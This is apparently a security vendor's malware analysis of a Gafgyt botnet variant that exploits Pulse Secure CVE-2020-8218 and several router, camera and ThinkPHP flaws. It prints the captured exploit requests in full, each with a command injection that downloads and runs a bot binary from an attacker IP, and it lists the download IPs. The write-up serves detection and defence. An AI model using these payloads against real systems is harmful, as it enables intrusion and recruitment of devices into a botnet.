A Gafgyt variant that exploits Pulse Secure CVE-2020-8218

When the world started to work-from-home, cybercriminals changed their focus. VPN technology, such as Pulse Secure’s Connect VPN, became a focus of attacks. For example, vphishing (voice phishing) is widely used in an attempt to steal employees’ VPN credentials and access their organization’s network either directly or by taking advantage of platform vulnerabilities.

During late summer 2020, a code execution vulnerability in Pulse Secure version 9.1 R7 was publicized and subsequently patched in version 9.1 R8.

However, recently Avira’s IoT labs have seen a surge in IoT malware binaries. These malware binaries contain multiple exploit footprints, and they include CVE-2020-8218 (Pulse Secure).

In this article, we will explore these new attacks.

Analysis

Analysis of the binaries led to the identification of a new variant of the Gafgyt family of malware.

Most of the functionality (shown below) is the same as Gafgyt.

However, it borrows some functionality from other families. For example, DNS amplification flooding comes from Tsunami, as shown below:

The binaries belong to different architectures, i.e., ARM, MIPS, PowerPC, Renesas SH, Intel, Motorola m68k, and SPARC. This indicates that the malware author(s) target almost every architecture to maximize the success of their exploit.

After successful threat chain analysis of the binaries, we identified the following IPs responsible for downloading the malware.

• 107[.]174.133.119
• 144[.]190.116

The malware tries to print “bigB04t” as an output via a write API call. This is a useful indicator to allow categorization of the malware.

The figure below shows a series of API calls.

Generally, IoT malware tries to manipulate the watchdog and prevents the device from restarting. Gafgyt malware does the same.

You will also notice that the malware downloads the payload from the same IPs as mentioned above:

Continuing the analysis, we found that the binary footprint of the malware contains multiple exploit traffic. Among those is the Pulse Secure Connect VPN exploit:

Pulse Secure SSL-VPN RCE Exploit Traffic (CVE-2020-8218)

The Pulse, Secure RCE vulnerability, CVE-2020-8218, was identified in version 9.1R7. It allows an unauthenticated user to run arbitrary code remotely. Though the exploit requires admin privileges authentication, it can be triggered by simply clicking on a malicious link by the admin. It is a command injection vulnerability found in the downloadlicenses.cgi file of the admin portal. More details available on the GoSecure website.

GET /dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever%20-n%20%27($x=%22wget%20http%3A%2F%2F107.174.133.119%2Fbins%2Fkeksec.x86%20-O%20-%3E%20%2Ftmp%2F.kpin%3Bchmod%20777%20%2Ftmp%2F.kpin%3B%2Ftmp%2F.kpin%22,system$x)%3b%20%23%27%20-e%20/data/runtime/tmp/tt/setcookie.thtml.ttc HTTP/1.1

User-Agent: kpin

Accept: */*

Connection: keep-alive

It is worth noted that Gafgyt malware keeps on adding new exploits in its pool of threat vectors. Although we see Pulse Secure Connect VPN exploit traffic here for the first time, most of the remaining ones found have been seen before in Gafgyt.

These are below:

LG SuperSignEZ CMS RCE Exploit Traffic (CVE-2018-171713)

This RCE vulnerability exploit targets LG SuperSign TVs leveraging built-in LG SuperSignEZ CMS in these TVs. This remote code execution results from improper parameter handling.

GET /qsr_server/device/getThumbnail?sourceUri=\'%20-%3Bcd%20%2Ftmp%3B%20wget%20http%3A%2F%2F107.174.133.119%2Fupdate.sh%3Bchmod%20777%20update.sh%3Bsh%20update.sh%3Brm%20-rf%20update.sh\'&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1

User-Agent: kpin

Accept: */*

Connection: keep-alive

CCTV/DVR RCE Exploit Traffic

This RCE exploit targets CCTV/DVR products from more than 75 vendors.

GET /language/Swedish${IFS}&&cd${IFS}%2Ftmp;${IFS}wget${IFS}http://107.174.133.119/update.sh;chmod${IFS}777${IFS}update.sh;sh${IFS}update.sh;rm${IFS}-rf${IFS}update.sh HTTP/1.1

User-Agent: kpin

Accept: */*

Connection: keep-alive

ThinkPHP RCE Vulnerability Exploit Traffic

This exploit targets ThinkPHP , a very popular web application development framework based on phpEsp used in the enterprise community. This RCE exploit vulnerability results from an insufficient validation of the controller name passed in the URL leads to a possible getshell vulnerability without the forced routing option enabled.

GET /?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=wget%20http://107.174.133.119/bins/keksec.x86%20-O%20%2Ftmp%2F.kpin;%20chmod%20777%20%2Ftmp%2F.kpin;2Ftmp%2F.kpin;%20rm%20-rf%20%2Ftmp%2F.kpin HTTP/1.1

Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: /

User-Agent: kpin

Netgear Routers Command Injection Vulnerability Traffic

This is an old RCE vulnerability exploit that targets Netgear DGN series routers. The vulnerability results from an insufficient validation of the user input within the setup.cgi script. An attacker could exploit the vulnerability by sending a crafted HTTP request. Processing such a request could allow a remote attacker to execute arbitrary commands with root privileges.

GET setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget+http://107.174.133.119/bins/keksec.mips -O /tmp/.kpin;chmod 777 /tmp/.kpin;/tmp/.kpin&curpath=/&currentsetting.htm=1 HTTP/1.1

User-Agent: kpin

Accept: */*

Connection: keep-alive

HNAP SOAPAction-Header Command Execution Traffic (CVE-2015-2051)

This exploit targets D-link devices. Various D-Link devices are vulnerable to OS command injection in the HNAP SOAP interface. More details available at https://www.exploit-db.com/exploits/37171

POST /HNAP1/ HTTP/1.0

Host: %s:%d

User-Agent: kpin

Connection: keep-alive

Content-Type: text/xml; charset=”utf-8″

SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://107.174.133.119/bins/keksec.mips -O /tmp/.kpin && chmod 777 /tmp/.kpin && /tmp/.kpin`

Content-Length: 640

<?xml version=”1.0″ encoding=”utf-8″?><soap:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/”><soap:Body><AddPortMapping xmlns=”http://purenetworks.com/HNAP1/”><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

D-Link Router Vulnerability Traffic (CVE-2019-16920)

This RCE vulnerability exploit targets D-Link products. The vulnerability is due to the bad authentication check.

POST /apply_sec.cgi HTTP/1.1

Host: %s:%d

User-Agent: kpin

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 142

Connection: close

Referer: http://%s:%d/

Upgrade-Insecure-Requests: 1

html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384

GET /login.cgi?cli=aa%20aa%27;wget%20http://107.174.133.119/bins/keksec.mips%20-O%20%2Ftmp%2F.kpin;%20chmod%20777%20%2Ftmp%2F.kpin;2Ftmp%2F.kpin;%20rm%20-rf%20%2Ftmp%2F.kpin%27$ HTTP/1.1

Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: kpin

GPON Home Router Vulnerability Traffic (CVE-2018-10561)

This exploit targets GPON home routers via authentication bypass.

POST /GponForm/diag_Form?images/ HTTP/1.1

User-Agent: kpin

Accept: */*

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget%20http://107.174.133.119/bins/keksec.x86%20-O%20%2Ftmp%2F.kpin;%20chmod%20777%20%2Ftmp%2F.kpin;2Ftmp%2F.kpin;%20rm%20-rf%20%2Ftmp%2F.kpin`&ipv=0

Huawei Home Router Vulnerability Traffic (CVE-2017-17215)

An arbitrary command execution vulnerability exploit of Huawei home routers. An attacker can send malicious packets to TCP port 37215 to launch attacks. A successful exploit can lead to the remote execution of arbitrary code.

Conclusion

In the past, malware like Gafgyt mostly exploited routers. However, as we can see, attackers have identified new opportunities and expanded their hit-list to more unusual targets such as VPNs. Targeting insecure channels demonstrates a response to market change and increasing maturity.

Of course, it is important to safeguard IoT endpoints installed in consumer environments, but also related all communication channels.

The Avira IoT Research team monitors such new malware families or variants and provide detections for them. Integrating Avira SafeThings and anti-malware technologies can help protect customers from such attacks.

Downloading URLs

Samples Info